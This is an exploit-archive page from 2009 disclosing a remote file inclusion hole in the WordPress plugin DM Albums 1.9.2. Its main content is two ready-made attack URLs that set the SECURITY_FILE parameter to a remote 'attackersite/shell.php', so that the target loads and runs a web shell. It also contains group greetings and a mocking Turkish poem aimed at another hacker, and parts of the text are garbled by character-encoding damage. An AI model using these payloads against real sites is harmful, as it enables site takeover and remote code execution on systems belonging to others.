[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WordPress Plugin DM Albums 1.9.2 Remote File Inclusion Vuln
# Published : 2009-06-29
# Author : Septemb0x
# Previous Title : Newsolved 1.1.6 (login grabber) Multiple SQL Injection Exploit
# Next Title : DM FileManager 3.9.4 Remote File Inclusion Vulnerability
#############################################################################################
[+] DM Albumsa?¢ 1.9.2 & WordPress Plug-in Remote File Include Vulnerability
[+] Author : Septemb0x
[+] www.Cyber-Warrior.Org - Information Technology's World
[+] Greetz : BARCOD3 And All Friends...
[+] Dork : Yok Dork Mork :D
[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/
#############################################################################################
[+] NORMAL EXPLOIT;
[+] http://[sitename]/[path]/template/album.php?SECURITY_FILE=http://attackersite/shell.php
[+] WORDPRESS EXPLOIT
[+] http://[sitename]/[path]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php
#############################################################################################
< ---- Note ---- >
H....R;
Sen ?§ok ??st??n zekaya sahip birisin,
emin olbilirsin, :D
Sql injection ile domain hackleyebilen tek lamersin, :D
ASP'de Rfi Bulmakta Birebirsin,
Ama G??rd??????m En h?±yar Lamersin :D
Bu Kafiyelerde Bi Taraf?±na Girsin ;)
Lol H....R :D
< ---- Note Finished ---- >
# www.Syue.com [2009-06-29]